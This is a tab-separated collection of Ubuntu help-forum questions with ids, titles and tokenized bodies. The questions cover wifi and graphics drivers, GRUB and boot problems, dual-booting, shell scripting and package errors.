498270	can login as guest but not me - also no wifi drivers	installed ubuntu 14.04 lts as a side project , on an old computer that had its operating system erased . i can log in as guest and everything works fine , but when i log in as me , the screen is blank . i 've read answers to this problem such as ... http : //www.computerandyou.net/2011/10/how-to-solve-unable-to-login-into-ubuntu-11-10/ and ... http : //ubuntuforums.org/showthread.php ? t=1867295 but when i press ctrl+alt+t or ctrl+alt+f1 in order to open the terminal from the login screen , nothing happens . ctrl+alt+t works fine when i am in guest , but not from the login . and , of course , i can not make any changes from the guest 's terminal . also wifi is not appearing , i am assuming that i am missing the drivers as i installed ubuntu without wifi access . i think i may be missing the wifi drivers and also vga drivers since the screen is n't working . but , i am a newbie to linux so any help is much appreciated !
498275	why do konsole and kate have different menubar color than other apps ?	here are some screenshots : i am using kubuntu 14.04 .
498278	why does linux ( ubuntu ) have better wifi connectivity than windows xp	i 've noticed and done some tests to confirm that with my dual boot computer when i use ubuntu i have better wifi connectivity than when i boot into windows xp . identical hardware configuration with usb wifi . when i 'm using windows it will connect and disconnect a lot and can be very frustrating . when using ubuntu i can play something that requires a constant internet connection without any connection drops . does anyone know why this is the case ?
498283	which files in home directory should not be shared between machines	i have two machines running the same version of ubuntu ( currently 14.04 64-bit ) ; one is a desktop and one is a laptop . the processors , graphics cards , and screen resolutions of the two machines are different , but i 'd like to share as much of the two home directories as possible . i realize that i should n't just mount , say , the desktop 's home directory on the laptop using nfs or some other service , since certain files should remain local to each machine ( .xauthority , .gvfs/* , files containing info depending on screen size , etc. ) . has anyone cataloged a list of the files and directories that must remain local to different machines -- even if they share everything else ? i 'd like to use this to develop a unison profile to help me keep these two machines in sync , ignoring the files that must remain separate . also , what about the related problem of keeping the installed software in sync ? is there an easy way to arrange that , if i install a package on one of the machines , the same package will ( eventually ) be installed on the other ?
498284	ubuntu server with ubuntu desktop does not have boot record , but it did when it was just basic server	the title says it all . i started by installing `` server '' with the ubuntu desktop package , and when it finished and rebooted : nothing . it completed full installation , rebooted , and there was no boot record on that hard drive ( i have two hard disks , first runs windows 8 , second was to be for server ) . i looked up tons of info , but most of it related to the guid partition and the mbr ( i know they are different ) , but short of deleting the whole thing and starting again , there was no good advice . so , i did that . and just installed the `` simple server '' package . it loaded fine , and even started as it should ( in the boot options screen , there it was sata2-ubuntu option ) and it booted to the cmd prompt . then , i did the usual [ sudo apt-get install ubuntu-desktop ] from cmd prompt and everything ran and completed fine . but ... on reboot , it 's gone ! no sata2-ubuntu option anymore ! any ideas anybody ? maybe another desktop ( l/k-buntu ) ? i do n't want to keep trial and error-ing it though , that seems silly and a tremendous amount of work . also , just in case the question comes up , the boot record wo n't even appear when i set the bios to legacy compatible . thanks to anyone who tries to help !
498285	how to install ath5k driver ?	i 've just installed on my laptop ubuntu 14.04 . my wifi does n't connect . my wifi is an atheros . i 've tried to use this http : //wireless.kernel.org/en/users/drivers/ath5k # enabling_ath5k instructions , but i 'm really confused and do n't know how to proceed at getting and enabling ath5k . please , help .
498288	rdp to ubuntu from windows no logon	i am running ubuntu 14.04 . i am trying to rdp from windows to ubuntu . i do not get to the desktop , but receive crosshatching and an `` x '' for a cursor . any ideas ?
498291	ca n't maintain wireless connection in 12.04 lts + ralink 3592	i have 12.04 lts . my wireless card is ralink 3592 . i was having trouble maintaining a wireless connection for more than a minute or two , so i followed the instructions here ... http : //askubuntu.com/a/182132/305908 ... but when i enter the last command mentioned ... sudo modprobe -v rt3562sta ... i see this error ... fatal : module 3562sta not found . now i have no wireless connection and my computer ca n't find any wireless networks . some background : i have three devices and this problem only exists in one of them . it is a dual-boot laptop with ubuntu and windows . in windows there is no problem . the problem only exists when i boot into ubuntu . the problem began a month or two ago , when i was losing my connection 2-3 times per day and could only fix it by rebooting . today i signed up with a new isp and now the problem is suddenly much worse , both when i connect to the new isp and the old one . however , on another ( older ) laptop that runs ubuntu only , there is no problem at all with either isp . and on my android phone , there is no problem with either isp . so the problem seems to be specific to the one laptop when it boots into ubuntu .
498294	latest hardware firmware update kills wifi	after installing the latest firmware update , my ubuntu 12.04 is left with no wifi . at boot , i get the message `` no rtlwifi firmware found '' . using synaptic i can find no such firmware in the repositories . can someone point me in the right direction ?
498296	incorrect magic mouse battery status	i 'm running 14.04 lts on a macbookpro1,1 . i 'm running blueman 1.23-git201403102151-1ubuntu1 , and though my magic mouse is working fine , my system seems to think that its battery level is 0 % . how can i get my system to show the correct battery level for my magic mouse ?
498298	where is the synergy configuration file ?	i downloaded the latest deb of synergy from the synergy website . when i run it i get an installer and get the option to enable the password etc . however , now i want to reset the password but i ca n't find the configuration . where does synergy store it 's configuration ? there is no /etc/synergy.conf or any synergy.conf file anywhere .
498302	ca n't boot from xubuntu usb stick	i want to install xubuntu from my fat32 memorex 2gb 0058 traveldrive . i currently have a windows 8 64-bit system and i 've already made the xubuntu live usb using unetbootin . i went to my bios and changed the boot order so that my usb flash drive boots first . the usb started flashing so i know it was being accessed , but then the computer boots up windows instead . i put 500mb into the startup memory option in unetbootin and told it to specifically boot from the usb , but it still booted windows , but the weird thing is is that i can run it perfectly in virtualbox , so it has nothing to do with the .iso image i 'm using . any answers are much appreciated .
498304	bluetooth receiver not listed in list-sinks even though paired	my bluetooth receiver says its paired and connected to my ubuntu 14.04 chromebook but does not get listed as an out device in pulseaudio volume control . when i try : pacmd list-sinks my bluetooth device does not show up . if i look at my bluetooth device manager i see the music receiver is there and can see the activity . what am i missing ? fyi pactl load-module module-bluetooth-discover results in 41 and sudo bluez-simple-agent hci0 00:12:6f:41:52 : ee results in : release new device ( /org/bluez/519/hci0/dev_00_12_6f_41_52_ee )
498308	gateway laptop wo n't boot from usb drive	well it kinda boots , but right when it should reach the screen to ask to install or try , i only get a black screen . i tried to put a hdd with ubuntu on it in my laptop , it boots fine until it reaches the grub menu , then i get the black screen , i can no longer use the laptop , it wo n't boot to windows due to a hardware change , but it used to . the laptop 's model number is : kayf0 . please help , any would be much appreciated .
498309	i get `error : unknow filesystem` on boot	i removed my ubuntu partition , now when my laptop boots it just shows : error : unknown filesystem . i tried booting with a live cd , but i still get : grub rescue > error .
498312	how to make those values i get from my linux script to become the values in my xml file	i have a problem on how can i make the values i get from my bash script to become the value to my xml file . below is my xml file : < ? xml version= '' 1.0 '' ? > < list > < info > < id > < /id > < date > < /date > < time > < /time > < num > < /num > < type > < /type > < /info > < info > < id > < /id > < date > < /date > < time > < /time > < num > < /num > < type > < /type > < /info > < info > < id > < /id > < date > < /date > < time > < /time > < num > < /num > < type > < /type > < /info > < info > < id > < /id > < date > < /date > < time > < /time > < num > < /num > < type > < /type > < /info > < info > < id > < /id > < date > < /date > < time > < /time > < num > < /num > < type > < /type > < /info > < /list > here is my bash script : # ! /bin/bash if [ `` $ ( egrep -l 'nu ' /home/archive/* | xargs egrep -l 'se ' ) '' ] then egrep -l 'nu ' /home/archive/* | xargs egrep -l 'se ' > /tmp/result.txt chmod 777 /tmp/result.txt a=1 while read line do path [ $ a ] = $ line file [ $ a ] =`basename $ line` cat $ line | awk ' { gsub ( `` ^ '' , rs ) ; print } ' > /tmp/tmp2.result.txt chmod 777 /tmp2/tmp.result.txt cat /tmp/tmp.result.txt | awk ' { gsub ( `` - '' , rs ) ; print } ' > /tmp/tmp.result.txt chmod 777 /tmp/tmp.result.txt id [ $ a ] =`sed -n '7p ' < /tmp/tmp.result.txt` date [ $ a ] =`sed -n '10p ' < /tmp/tmp.result.txt` time [ $ a ] =`sed -n '11p ' < /tmp/tmp.result.txt` num [ $ a ] =`sed -n '14p ' < /tmp/tmp.result.txt` type [ $ a ] =`sed -n '26p ' < /tmp/tmp.result.txt` # echo -e `` file : $ { file [ $ a ] } '' > > /tmp/result.result.tmp # echo -e `` type : $ { type [ $ a ] } \id : $ { id [ $ a ] } \tdate : $ { date [ $ a ] } \ttime : $ { time [ a ] } \tnum : $ { num [ $ a ] } '' > > /tmp/result.result.tmp done < /tmp/result.txt fi
498314	ubuntu 14.04 wireless switch not turning on ( hp 2000 series )	i have an hp 2000 series laptop , which wireless apparently worked yesterday , i let my best friend play on it , then noticed he switched to my desktop while i was gone . i later find out that my internet is n't working on that laptop . so , i then notice that my wireless key was stuck in off mode , i first try going win to the bios and restoring to default settings , it did n't work . i also tried checking to see if i have any drivers to download , which apparently i had nothing . and , i can not perform a fresh install as something happened after installing ubuntu that locked me out of booting from cd/dvd . i also ca n't find a flash drive that has the ability to make a computer boot from it , i have also seen another post here but it did n't work for me .
498315	no alt + tab in 14.04 gnome flashback session ?	i 've just upgraded to 14.04 and installed the gnome flashback session . however , alt + tab does n't bring up an application switcher . i 've tried compiz config settings manager , but there are no options for the switcher outside of the unity menus . is there a work around for this ? i much prefer classic / flashback over unity ... any help is greatly appreciated ...
498319	custom launcher arguments ?	i know i can add custom shortcuts or even url links to the launcher . can i create custom launcher shortcuts that accept or process arguments ? for example , can i set a launcher link to open http : //google.com/ # q= % s , so that when i type google cat videos in launcher , it will open the link replacing % s with cat videos ?
498320	ubuntu 14.04 windows 8.1 grub crashes install	i 've been trying for days to get ubuntu 14.04 dual booted on my windows 8 preinstalled laptop with uefi . my laptop is a dell inspiron 15r 5537 . i followed a tutorial that had me disable fast start up , but keep secure boot and efi boot enabled . most of the install seems to go right , until the very end , where it claims that the installer failed because it was unable to install grub2 . in all the videos i 've seen , this never happens to anyone else , and after the successful install they are able boot from the live disc and fix grub with boot-repair . however , when i try this it says to disable secure boot and try again . after doing so i retried boot-repair . it still gave me errors , and i could only boot to windows 8.1 . it gave me this link to explain what went wrong : http : //paste.ubuntu.com/7797066/ fortunately i was able to delete the unsuccessful install partition and swap partition and restore it to my c : space . i plan to create a new unallocated space for a fresh ubuntu install . does anyone know what i am doing wrong ?
498323	intel_rapl problem running ubuntu 14.4 using virtual box	i downloaded a disk image of ubuntu 14.04 and then tried to create a virtual machine using virtual box . it gave me the following error : intel_rapl : no valid rapl domains found in package 0alized upgrade bios or use force_addr=0xaddr . what can be the possible reason ?
498324	no boot option after installing ubuntu	i just got a new asus laptop with windows 8 preinstalled . when i installed ubuntu , everything went smoothly but when i restarted it , it booted into windows . i checked the boot options in the uefi bios thing and the only boot option there was windows . i checked if ubuntu was installed , and the partition was there and everything . so , i tried reinstalling grub with boot-repair but it has n't worked . please help ! -austin
498326	ca n't find archive for package libx264-123	i received a message saying `` there seems to be a programming error in aptdaemon , the software that allows you to install/remove software and to perform other package management related tasks . '' i then tried these commands sudo dpkg -- configure -a sudo apt-get install ttf-mscorefonts-installer but at the end it returned an error saying the package libx264-123 needs to be reinstalled , but i ca n't find an archive for it .
498329	ubuntu on asus x550ca laptop	i would like to know if there is the possibility of install ubuntu in my laptop asus x550c . how should i proceed to install all the drivers correctly ? thanks !
498331	( software-properties-gtk ) double running in the same os . is it a problem ?	i am new here : ) and starting studies . i found 2 files same name on central de programas do ubuntu 14.04 lts generic . is it normal ? best regards ( y )
498334	newbie c programming question	can anyone explain why the output of this code is 2 ? i mistakenly thought it was 3. int array [ ] = { 1 , 2 , 3 } ; int *address = array ; array [ 0 ] = 2 ; array [ 1 ] = array [ 2 ] ; array [ 2 ] = *address ; printf ( `` % d\n '' , array [ 2 ] ) ; return 0 ;
498335	how can i uninstall ubuntu when dual-booted ?	i 've been deciding on whether to install ubuntu and keep it as dual-boot , or to only use windows , and i need to know how to uninstall ubuntu and keep windows alone , with all my windows data left on the system .
498337	laptop fan speed too low when not docked	i 'm using ubuntu 14.04 on my laptop and things are great except that it gets quite hot sometimes . i 'm using sensors ( lm-sensors ) to report temperature and fan speed . i run a thinkpad t430s with ivy bridge core i5 . when i am at home , plugged into power , the cpu temps reach over 90*c. when i 'm at work , docked into my laptop , the fan speeds run higher and temps hover around 80*c. any one knows why this might be the case ? kernel : 3.13.0-24-generic # 47-ubuntu smp sensors output , no dock : thinkpad-isa-0000 adapter : isa adapter fan1 : 4063 rpm coretemp-isa-0000 adapter : isa adapter physical id 0 : +90.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +84.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +90.0°c ( high = +87.0°c , crit = +105.0°c ) sensors output , docked : acpitz-virtual-0 thinkpad-isa-0000 adapter : isa adapter fan1 : 4680 rpm coretemp-isa-0000 adapter : isa adapter physical id 0 : +81.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +74.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +81.0°c ( high = +87.0°c , crit = +105.0°c )
498339	ca n't start sublime with gksu	after typing gksu subl or gksudo subl , it asked for my password . but after that , nothing happened . do note that , with sudo . it works . why is that and how to fix this ?
498342	how to change root permission by text console	i have edited and restarted the permission for both root and others for a folder 'usr ' and restarted the system now ican only load the text console how to change the permission of that folder using teaxt console
498345	how to install debian , only with console no graphic interface ! its a minimal install	how do i install debian and connect to a network ? okey . i have my debian on virtualbox . the problem is that i need to connect debian to the network . how do i connect it ? i 'm trying but .. i do n't know which command have to type .
498348	how can i start to debug external displays not being detected ?	i 'm running 14.04 on a hp probook 650 . it has the built in graphics card and standalone ; integrated : intel速 hd graphics 4600 discrete : amd radeontm hd 8 8750m ( 128-bit ) w/1 gb gddr5 on a fresh install of 14.04 i was able to use a docking station to drive one dvi external monitor , the display port to drive another external monitor as well as the builtin 15 '' screen , making a total of 3 . that worked out of the box , no configuration required . after 4 weeks of getting it setup , no single action seem to have killed both external displays but it seems to be from a combination of removing the laptop from the dock unplugging the display port pulling standard ubuntu updates configuring the displays through settings > displays have rendered the display port monitor then docking station monitor undetectable . none of the external displays are detected at all any more and as far as i 'm aware i 've not messed with any display config / software other that what is mentioned . sorry to be rather vague on details of the displays becoming undetectable but it really was as random as it seems . i 'm really just after some advice on where to start to try and debug this . so far i 've just tried enabling the 3rd party drivers that were offered through software & updates poking around in the catalyst application and enabling `` rendering and additional displays '' in the switchable graphics section . i 'm a software dev with a bit of commandline fu , so any guidance of that nature appreciated too .
498352	what does the first ' . ' do in . ~/.bashrc ?	i saw a post about fix your alias in .bashrc . and he says after you put your alias in .bashrc , you need to use : . ~/.bashrc i do not quite understand what the first dot ( ' . ' ) does here . what 's its function and what is it called ?
498362	how to migrate from ubuntu desktop to ubuntu server ?	i am using ubuntu 14.04 lts desktop version , i would like to use ubuntu 14.04 server . is it possible to migrate from ubuntu desktop to ubuntu server without losing any of my data ?
498363	xubuntu flash drive wo n't boot	hi i have tried download xubuntu linux off of a live flash drive and have not been able to do it . i used unetbootin to make my live flash drive . i have a 2gb memorex 0058 travel drive . i have a windows 8 64-bit machine . i configured the bios to boot the flash drive first but it still loaded windows instead . i even told it to specifically boot off the flash drive and it still booted windows instead . the flash drive blinks when i restart so i know it 's being accessed but not even the xubuntu logo loads up it just goes straight to windows . but the weird thing is is that i can run it perfectly in virtualbox so it has nothing to do with the .iso image i 'm using . all the help is appreciated .
498365	how do i remove amd driver of an unbootable system ?	i installed amd 's proprietary driver via `` software & updates '' , and now it hangs shortly after booting using grub . i 'd like to uninstall the amd driver , but i ca n't even boot far enough to switch to a terminal session ( ctrl+alt+f1 ) . does anyone know how i can remove the driver if i ca n't boot to the desktop ?
498370	problem in converting math in latex to epub using pandoc	latex code in my tex file : $ \frac { \partial h } { \partial q_i } $ $ = $ $ \dot { p } _i $ , $ \frac { \partial h } { \partial p_i } =\dot { q } _i $ i have given the following command in terminal pandoc -s science.tex -o science.epub pandoc is not converting the certain math codes . please advise .
498373	how to compile uclinux on ubuntu ?	i am configuring the uclinux in linux ubuntu platform.after i make selection for the vendor and vendor product , it comes to a halt at the command window , but according to my user guide i have to still configure settings for the boot options , application and library settings.does anyone before had done uclinux porting help me on these area ?
498374	how can i make my macbook pro 's trackpad feel right ?	i tried for several hours to make my macbook pro 's trackpad feel `` right '' in ubuntu . i tried a number of synclient settings recommended by various blog articles and forum posts , and also tried playing with settings myself . the issues mainly seem to stem from strange behavior when multiple touches are detected . while attempting to drag & drop ( using thumb to hold down 'click ' and index finger to drag ) , the cursor will often become unresponsive . also if a portion of my palm happens to touch the bottom-right corner of the trackpad at any time while my thumb is already resting at the bottom , the cursor will become unresponsive . there are other instances of cursor issues for which i 'm having trouble creating a list of steps to reproduce , but the issues are frequent enough to be a major annoyance . attempting to change my behavior to use the trackpad in a way that does n't cause cursor issues feels unnatural and results in hand fatigue within about 30 minutes . does anyone have any firsthand experience on making the trackpad feel like it does in os x ? i 'm attempting to return to desktop linux after an 8 year absence , and the experience is frustrating so far .
498375	find commands with man pages	we use man foo to search about command foo . to know what is it and what its task and to find all switches . but the point is when you want to do foo and you do not know what is the command for that . i wish to find among man pages to know which command related to this ? my question : is there any way to guess what is appropriate command for your need without access to internet and googling ? and finding them just by man on the terminal ?
498377	how to write shell script for creating zip ?	i need to write a shell script .sh file which is creating a zip file from /var/www as a sudo user . i have my ubuntu server and my site hosted on it which means my source code is in /var/www folder . but /var/www has writeable permissions only for root user . i want to write a script for backing up the /var/www folder as a zip every time i run that script with no need to ask root user password .
498378	ca n't download anything from software center nor online with ubuntu 14.04	i installed ubuntu 14.04 with a usb drive and everything works fine , the only problem is that whenever i try to install any kind of software ( chrome , steam , etc . ) it tells me that i have missing packages . for example , whenever i try to install steam it starts applying changes , but then it says : package operation failed the installation or removal of a software package failed . in the details section commands like : dpkg : warning : files list file for package'libsignon-qt5-1 missing ; assuming package has no files currently installed i 've tried updating with sudo apt-get -f and sudo apt-get update but nothing seems to help . so is there a way to fix this and how ? i 'm not very familiar with ubuntu . i 've only had it for a month so far . thanks in advance .
498379	how can i identify the program that has written information to a log file ?	i recently got a message that something had failed to sudo on my ubuntu laptop . at the time , i do n't believe i was running anything that would need sudo . the messages that appeared in /var/log/auth.log are : jul 16 11:50:56 laptop sudo : pam_unix ( sudo : auth ) : conversation failed jul 16 11:50:56 laptop sudo : pam_unix ( sudo : auth ) : auth could not identify password for [ mv ] jul 16 11:50:56 laptop sudo : pam_unix ( sudo : auth ) : conversation failed jul 16 11:50:56 laptop sudo : pam_unix ( sudo : auth ) : auth could not identify password for [ mv ] jul 16 11:50:56 laptop sudo : pam_unix ( sudo : auth ) : conversation failed jul 16 11:50:56 laptop sudo : pam_unix ( sudo : auth ) : auth could not identify password for [ mv ] jul 16 11:50:56 laptop sudo : mv : 3 incorrect password attempts ; tty=unknown ; pwd=/home/mv ; user=root ; command=/usr/bin/env -u language lc_messages=c /bin/sh /tmp/tmpbhxhyv/ : script : the similarity to the log in this question makes me think this was generated by update-manager . is there a way to confirm whether it was update-manager or another program that caused this error to be logged to /var/log/auth.log ? alternatively , has anyone seen this particular sequence of log lines before ? thanks for your help . edit : /tmp/tmpbhxhyv/ directory no longer exists from what i can see , while update-manager is running , it creates these /tmp/tmpxxxxxx/ directories ( where the x 's are random ) . to clarify my question somewhat , i 'd like to know if/how i can directly reference something in the update-manager code that generates lines of this format . i 've had a look through the source code for my update-manager version , but was n't able to work this out . thanks again !
498384	md5sum of iso does n't match	i have downloaded a variant of ubuntu and mint ( ultimate edition 4.0 ) twice but the md5sum hash does not match at all .the source of the .iso was sourceforge.net should i be worried ?
498385	error : bitbake core-image-base for beaglebone	i am new comer . i got an error while bitbaking to get image file . error is shown here : | # # -- -- -- -- -- - # # | # # confdefs.h . # # | # # -- -- -- -- -- - # # | | /* confdefs.h */ | # define package_name `` '' | # define package_tarname `` '' | # define package_version `` '' | # define package_string `` '' | # define package_bugreport `` '' | # define package_url `` '' | # define package `` alsa-utils '' | # define version '' 1.0.27.2 '' | # define enable_nls 1 | # define have_gettext 1 | # define have_dcgettext 1 | # define have_libasound 1 | # define have_alsa_pcm_h 1 | # define have_alsa_mixer_h 1 | # define have_alsa_rawmidi_h 1 | # define have_alsa_seq_h 1 | # define have_samplerate_h 1 | # define have_librt 1 | # define have_clock_gettime 1 | # define stdc_headers 1 | # define enable_nls_in_curses 1 | # define have_sys_types_h 1 | # define have_sys_stat_h 1 | # define have_stdlib_h 1 | # define have_string_h 1 | # define have_memory_h 1 | # define have_strings_h 1 | # define have_inttypes_h 1 | # define have_stdint_h 1 | # define have_unistd_h 1 | # define have_panel_h 1 | # define have_menu_h 1 | # define have_form_h 1 | | configure : exit 1 | error : oe_runconf failed | warning : /home/ahmer/yocto/poky/build/tmp/work/cortexa8hf-vfp-neon-poky-linux-gnueabi/alsa-utils/1.0.27.2-r0/temp/run.do_configure.11519:1 exit 1 from | exit 1 | error : function failed : do_configure ( log file is located at /home/ahmer/yocto/poky/build/tmp/work/cortexa8hf-vfp-neon-poky-linux-gnueabi/alsa-utils/1.0.27.2-r0/temp/log.do_configure.11519 ) error : task 1003 ( /home/ahmer/yocto/poky/meta/recipes-multimedia/alsa/alsa-utils_1.0.27.2.bb , do_configure ) failed with exit code '1 ' note : tasks summary : attempted 1432 tasks of which 1424 did n't need to be rerun and 1 failed . waiting for 0 running tasks to finish : summary : 1 task failed : /home/ahmer/yocto/poky/meta/recipes-multimedia/alsa/alsa-utils_1.0.27.2.bb , do_configure summary : there was 1 error message shown , returning a non-zero exit code . ahmer @ pkl-ahsaleem-ubuntu : ~/yocto/poky/build $ bitbake alsa -c clean loading cache : 100 % | # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # | eta : 00:00:00 loaded 1222 entries from dependency cache . error : nothing provides 'alsa ' . close matches : vala summary : there was 1 error message shown , returning a non-zero exit code . list item please help ! ! ! if you have any solution ! ! ! ! thnaks
498391	is xvfb ( x window system virtual frame buffer ) open source	please tell me xvfb is open source or not.if xvfb is open source please send me link for xvfb souce package for unix like operating systems .
498392	ubuntu 14.04 and php 5.4	i am running ubuntu 14.04 . previously i was running php 5.5 on apache2 server . due to some specific requirements , i had to run php 5.3 . i did it by removing the current version and installing php 5.3.28 but it does not seem to work . it is because of the dependency issues or does ubuntu lts does not support php 5.3 ? kindly let me know . any advice would be very helpful .
498401	installing nvidia drivers to 14.04 ?	i am running a samsung chronos 7 with an nvidia geforce gt 640m graphics card . i would like to utilize this graphics card so that i may use my computer for various computer games . previously , when i tried to install drivers via the sudo command for downloading the current drivers for my card , ubuntu would not boot past the splash screen , and eventually `` gave up on finding the root '' . i am starting from a fresh install of ubuntu 14.04 , and i request some help on what to do .
498402	not every feature supported in lubuntu interface	i ve been using lxde for a month and newly i ve realized that not every option included in lxde interface . for example when i start ubuntu with default unity interface , everything is normal . but when i open with lighter interface which is lxde , for example i cant find `` startup windows '' tool anywhere ! or i could not find `` shorcuts for keyboard '' . or i could not find any `` screen lock '' options . i found something like screensaver but it does not include everything i need . so i must ask that is there anything i missed about downloading this lighter interface ? should i download more stuff to be able to use every general ubuntu softwares and tools ? if so , what are they ?
498407	how to transform ubuntu 12.04 into mac	can anyone help me how to make ubuntu look like mac ? i tried using the ubuntu tweak tool . it did n't do me that good ...
498412	unable to locate package kubuntu-plasma5-desktop on 14.04	i am attempting to install kubuntu-plasma5-desktop on kubuntu 14.04 amd64 , following these instructions sudo apt-add-repository ppa : neon/kf5 sudo apt update sudo apt install project-neon5-session project-neon5-utils project-neon5-konsole sudo apt-add-repository ppa : kubuntu-ppa/next sudo apt-add-repository ppa : ci-train-ppa-service/landing-005 sudo apt update sudo apt install kubuntu-plasma5-desktop unable to locate package kubuntu-plasma5-desktop how can i fix this error ?
498421	âunable to install grub in /dev/sdaâ with new ubuntu only installation	i 'm not a computer wizard , just a regular user , so please help , but keep in mind that i need simple but detailed answers : - ) i just got gigabyte z87m-d3h motherboard with intel i7-4790k cpu . i have two new kingston hyperx 240gb ssd drives striped together . i have 14.04 installation dvd from where i boot and select install ubuntu with `` download updates while installing '' and `` installing third-party software '' options ticked . i choose clean installation that deletes everything , if there was something to delete . i also selected to use lvm by ticking the option . then choosing install now . choosing where i am , choosing keyboard layout , inputting who i am , and the systems starts to copy and install ubuntu . all well until in the end it says : unable to install grub in /dev/sda executing 'grub-install /dev/sda ' failed . this is a fatal error any idea what i should do to get the installation done ?
498422	install git from source	i am attempting to install git from source to use last version of git . http : //git-scm.com/book/en/getting-started-installing-git $ tar -zxf git-2.0.1.tar.gz $ cd git-2.0.1 $ make prefix=/usr/local all $ sudo make prefix=/usr/local install - $ git -- version git version 1.9.1 what did i do wrong ? kubuntu 14.04 , amd64 .
498425	does anyone know if there 's a way to run a directx disk on ubuntu ?	i know directx is associated with windows but i want a way to do so with linux ubuntu . i love oblivion and it 's a game made for windows ( using the directx thingy ) and do n't really wan na go torrenting or anything like that , so is there way to maybe get a directx simualtor to run my old pc games ?
498429	hide a particular account from user accounts	how to hide a particular administrator account from user accounts in system settings ? i need it for security reasons . is it possible ?
498432	how to install openstack in ubuntu 14.04 ?	i would like to install openstack havana in my system ( 14.04 ) . i have tried this link . i haveclone` devstack by , sudo git clone https : //github.com/openstack-dev/devstack.git -b stable/havana i can saw in folder devstack , arul @ arul-pc : ~/openstack/devstack $ ls authors exerciserc extras.d hacking.rst openrc run_tests.sh stack.sh unstack.sh clean.sh exercises files lib readme.md samples tests eucarc exercise.sh functions license rejoin-stack.sh stackrc tools when i try , arul @ arul-pc : ~/openstack/devstack $ ./stack.sh i got response as , warning : this script has not been tested on trusty [ call trace ] ./stack.sh:137 : die [ error ] ./stack.sh:137 if you wish to run this script anyway run with force=yes where i can get 'openstack ' tested with trusty ? edit when i tried to install icehouse using , arul @ arul-pc : ~ $ sudo add-apt-repository cloud-archive : icehouse i got response as , ubuntu cloud archive for openstack icehouse more info : https : //wiki.ubuntu.com/serverteam/cloudarchive press [ enter ] to continue or ctrl-c to cancel adding it cloud-archive only supported on precise
498433	how can i extract specific string in linux ?	i 'm a newbie in bash and i had a difficulty on how i will get the specific string in my file below : ds*sc*s45wg*x56558*2 ne*823*2*sc*q345w45*dt*rtd*7530srt rjtroit**20140617 sna**tp*55 ds*sc*s45wg*x56558*2 ne*17*2*sc*211*dt*dfs*75304ksrtrsht**20140617 rss**tp*55 ds*sc*s45wg*x56558*2 ne*18*1*sc*3435*dt*pr*753slrt jsrt**20140617~rss**tp*55 ds*sc*s45wg*x56558*1 ne*19*1*sc*ers*dt*dfs*753048sry tsery4654**20140617~rss**tp*60 ds*sc*s45wg*x56558*1 ne*19*1*sc*frae*dt*ess*753048499rytsr**20140722 rss**tp*140 ds*sc*s45wg*x56558*1 ne*73*46464 sd**15769 sna*pui*000015769 with this file i have stated above , i want to get all these following data/values : 7530srtrjtroit 75304ksrtrsht 753slrtjsrt 753048srytsery4654 753048499rytsr ( those next to ne*823*2*sc*q345w45*dt*rtd for example ) . thanks !
498434	create a working link on desktop	i am totally new to ubuntu/linux and i want to create a link on a desktop ( is this called an application launcher ? ) . i created a .desktop file placed on the desktop with this content but it does n't start the application : [ desktop entry ] type=application comment=git version control system 6.0.3 icon=/usr/local/bin/develop/versioncontrol/smartgithg-6_0_3/bin/smartgithg-64.png exec=/usr/local/bin/develop/versioncontrol/smartgithg-6_0_3/bin/smartgithg.sh terminal=false categories=development ; ide ; java ; name [ en_us ] =smartgit 603 ll outputs ... -rwxrwxr-x 1 diulrich diulrich 321 jun 18 18:35 smartgit 603.desktop* i am using ubuntu 12.04 also , i have checked 'allow executing file as program ' in the permissions tab when right-clicking the desktop symbol . update : i tried to set required environment variable smartgithg_java_home in .bashrc , .profile and in /etc/environment without success . modifying the exec property in the .desktop file this way : exec=env smartgithg_java_home=/usr/lib/jvm/jdk1.7.0_40 /usr/local/bin/develop/versioncontrol/smartgithg-6_0_3/bin/smartgithg.sh i am able to start the application by clicking the desktop symbol . i wonder why this happens ? is gnome ( gnome is responsible for running .desktop files , is n't it ? ) using another shell so that it does not execute .bashrc/.profile an subsequently smartgithg_java_home is not set ?
498435	system hangs on /etc/fstab after forceful restart	i have to following fdisk -l device boot start end blocks id system /dev/sda1 2000896 3999743 999424 83 linux /dev/sda2 * 4194304 5242879 524288 83 linux /dev/sda3 5242880 167772159 81264640 83 linux blkid -o list device fs_type label mount point uuid -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - /dev/sda1 swap swapname ( not mounted ) d4bd9a66-3249-4ee4-b92e-ea1d3c31c113 /dev/loop0 ext2 ( in use ) 40c4ea95-0ecc-4c51-9f3e-e49d8f62f160 /dev/sda2 ext3 ( not mounted ) 6f1d654f-151d-4e88-8164-b3a318753971 /dev/sda3 ext4 ( not mounted ) c930ecd2-929b-4eef-90d3-60a9ee420f95 my /etc/fstab is empty when i restart it hangs do i need to add the uuid to etc/fstab ?
498438	login issue after 14.04 upgrade	i have a user account that has no password , but ubuntu wants one after the screen times out and it goes back to the login screen . it wo n't let you log back in unless you switch users to get back to the regular login scree .
498439	how to learn shell programming in linux ?	i use ubuntu and have no idea about dos/powershell programming and i know only c language . please suggest a good book on shell programming , and also any advice regarding prerequisites for shell programming .
498441	cat command replace text linux shell script	i have shell script file . in there is code like : < tag > port:8080 < /tag > . i want to replace this code line with another code line : < tag > port:3128 < /tag > . how do i do that ? i used cat , but it removed all the code lines and only added this code line..can anyone tell me how to replace the text in shell scripting ? this is how i tryed it : cat < < eof > /home/samples/pom.xml < tag > port:3128 < /tag > eof
498442	doubt : locate command : reschedule to every 2 mins	will mlocate cron scan complete file system in scheduled time ? or will it just merge databases whatever files/folders added between scheduled time ? i am planning to reschedule mlocate cron job to every 2 mins . does it make sense ?
